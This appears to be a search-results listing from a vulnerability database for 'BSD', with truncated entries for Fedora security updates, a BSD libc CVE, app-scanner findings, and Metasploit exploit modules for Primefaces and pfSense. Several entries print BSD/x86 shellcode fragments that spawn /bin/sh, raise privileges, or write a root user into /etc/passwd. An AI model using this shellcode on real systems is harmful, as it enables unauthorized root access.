1467 matches found
[SECURITY] Fedora 27 Update: wpa_supplicant-2.6-14.fc27
wpasupplicant is a WPA Supplicant for Linux, BSD and Windows with support for WPA and WPA2 IEEE 802.11i / RSN. Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11...
CVE-2016-6559
Improper bounds checking of the obuf variable in the linkntoa function in linkaddr.c of the BSD libc library may allow an attacker to read or write from memory. The full impact and severity depends on the method of exploit and how the library is used by applications. According to analysis by...
CVE-2016-6559
CVE-2016-6559 concerns the BSD libc function link_ntoa() in linkaddr.c, where the obuf bounds are mishandled. The root cause is improper bounds checking, which could allow memory read/write. Public analyses from FreeBSD indicate it is unlikely that applications expose an exploitable use of link_n...
CVE-2016-6559 The BSD libc library's link_ntoa() function may be vulnerable to a classic buffer overflow
Improper bounds checking of the obuf variable in the linkntoa function in linkaddr.c of the BSD libc library may allow an attacker to read or write from memory. The full impact and severity depends on the method of exploit and how the library is used by applications. According to analysis by...
[SECURITY] Fedora 28 Update: botan2-2.7.0-1.fc28
Botan is a BSD-licensed crypto library written in C++. It provides a wide variety of basic cryptographic algorithms, X.509 certificates and CRLs, PKCS \10 certificate requests, a filter/pipe message processing system, and a wide variety of other features, all written in portable C++. The API...
[SECURITY] Fedora 27 Update: botan2-2.7.0-1.fc27
Botan is a BSD-licensed crypto library written in C++. It provides a wide variety of basic cryptographic algorithms, X.509 certificates and CRLs, PKCS \10 certificate requests, a filter/pipe message processing system, and a wide variety of other features, all written in portable C++. The API...
Otseca - Security Auditing Tool To Search And Dump System Configuration
Otseca is a open source security auditing tool to search and dump system configuration. It allows you to generate reports in HTML or RAW-HTML formats. For more information, see wiki. How To Use It's simple: Clone this repository git clone https://github.com/trimstray/otseca Go into the repository...
Ruby Base64 Encoder
This encoder returns a base64 string encapsulated in eval%base64 encoded string.unpack%m0.first. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ruby Base64 Encoder', 'Description' = %q This...
Eidoo - BSD license, MIT license, WebView code execution vulnerabilities
HackApp vulnerability scanner discovered that application Eidoo published at the 'play' market has multiple vulnerabilities...
Untappd - Discover Beer - BSD license, Exported components, External URLs vulnerabilities
HackApp vulnerability scanner discovered that application Untappd - Discover Beer published at the 'play' market has multiple vulnerabilities...
Primefaces 5.x - Remote Code Execution Exploit
Exploit for java platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit', 'Description' = %q This module...
BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)
/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 39 bytes OS = BSD written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callme main: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al lea ebx,esi+8 push ebx lea ebx,esi push ebx mov al,5...
BSD/x86 - execve (/bin/sh) Shellcode (28 bytes)
/ simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; void...
BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
/ writes the line for user in /etc/passwd with uid&gid == 0 OS: BSD length: 74 written by dev0id email protected rootteam.void.ru rus-sec /Efnet.org greetz: mig nerf BITS 32 main: xor eax,eax push eax push byte 0x64 push word 0x7773 push long 0x7361702f push long 0x6374652f mov ebx,esp mov al,0x0...
BSD/x86 - setreuid(geteuid(), geteuid()) + execve(/bin/sh) Shellcode (36 bytes)
/ bsd/x86 setreuid/exec shellcode setreuidgeteuid, geteuid and execve"/bin/sh", "/bin/sh", 0 shellcode based on hkpco's setreuid/exec shellcode for linux Tested on FreeBSD / include include char shellcode = "\x31\xc0\xb0\x19\x50\xcd\x80\x50" "\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuidgeteuid,...
pfSense 2.1.3-RELEASE (amd64) Remote Command Execution Exploit
pfSense, a free BSD based open source firewall distribution, versions 2.2.6 and below contain a remote command execution vulnerability post authentication in the rrdgraphimg.php page. The vulnerability occurs via the graph GET parameter. A non-administrative authenticated attacker can inject...
pfSense authenticated group member RCE
pfSense, a free BSD based open source firewall distribution, version 'pfSense authenticated group member RCE', 'Description' = %q pfSense, a free BSD based open source firewall distribution, version 's4squatch', discovery 'h00die' module , 'References' = 'EDB', '43128' , 'URL',...
[SECURITY] Fedora 27 Update: botan-1.10.17-1.fc27
Botan is a BSD-licensed crypto library written in C++. It provides a wide variety of basic cryptographic algorithms, X.509 certificates and CRLs, PKCS \10 certificate requests, a filter/pipe message processing system, and a wide variety of other features, all written in portable C++. The API...
[SECURITY] Fedora 26 Update: botan-1.10.17-1.fc26
Botan is a BSD-licensed crypto library written in C++. It provides a wide variety of basic cryptographic algorithms, X.509 certificates and CRLs, PKCS \10 certificate requests, a filter/pipe message processing system, and a wide variety of other features, all written in portable C++. The API...
[SECURITY] Fedora 25 Update: botan-1.10.17-1.fc25
Botan is a BSD-licensed crypto library written in C++. It provides a wide variety of basic cryptographic algorithms, X.509 certificates and CRLs, PKCS \10 certificate requests, a filter/pipe message processing system, and a wide variety of other features, all written in portable C++. The API...